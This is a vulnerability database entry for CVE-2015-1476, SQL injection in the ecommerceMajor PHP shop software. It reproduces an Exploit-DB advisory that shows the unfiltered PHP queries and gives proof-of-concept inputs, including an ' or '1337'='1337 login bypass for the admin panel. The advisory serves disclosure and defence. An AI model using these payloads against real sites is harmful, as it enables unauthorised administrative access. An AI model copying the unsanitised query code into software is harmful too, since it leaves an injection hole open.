CVE-2015-1476
high
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
8.5
Description
Multiple SQL injection vulnerabilities in xlinkerz ecommerceMajor allow remote attackers to execute arbitrary SQL commands via the (1) productbycat parameter to product.php, or (2) username or (3) password parameter to __admin/index.php.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ecommerceMajor - SQL Injection / Authentication Bypass
##################################################################################################
#Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass
#Author : Manish Kishan Tanwar
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Date : 22/01/2015
#Discovered at : IndiShell Lab
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi
#email : manish.1046@gmail.com
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
ecommercemajor is the php based CMS for ecommerce portal
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
SQL injection vulnerability:-
==============================
in file product.php data from GET parameter 'productbycat' is not getting filter before passing into SQL query and hence rising SQL Injection vulnerability
---------------------
$getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc";
---------------------
POC
http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI
Authentication Bypass:-
==============================
file index.php under directory __admin has SQL injection vulnerability
parameter username and password suppliedin post parameter for checking valid admin username and password is not getting filter before passing into SQL query which arise authentication bypass issue.
vulnerable code is
-------------------
if(isset($_POST[login]))
{
$check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'";
$checkresult=mysql_query($check);
$checkcount=mysql_num_rows($checkresult);
if($checkcount>0)
{
$checkrow=mysql_fetch_array($checkresult);
$_SESSION[adminname]=$checkrow[adminname];
$_SESSION[adminloginstatus]="success";
echo "<script>window.location='home.php';</script>";
}
--------------------
POC
open admin panel
http://127.0.0.1/ecommercemajor/__admin/
username: ' or '1337'='1337
password: ' or '1337'='1337
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
#############################################################################################
--==[[Love to]]==--
#Kishan Tanwar,Mrs. Ritu Rathi,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| ecommercemajor_project | ecommercemajor | | |
References
- http://osvdb.org/show/osvdb/117569
- http://osvdb.org/show/osvdb/117570
- http://packetstormsecurity.com/files/130073/ecommerceMajor-SQL-Injection.html
- http://www.exploit-db.com/exploits/35878
- http://osvdb.org/show/osvdb/117569
- http://osvdb.org/show/osvdb/117570
- http://packetstormsecurity.com/files/130073/ecommerceMajor-SQL-Injection.html
- http://www.exploit-db.com/exploits/35878
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.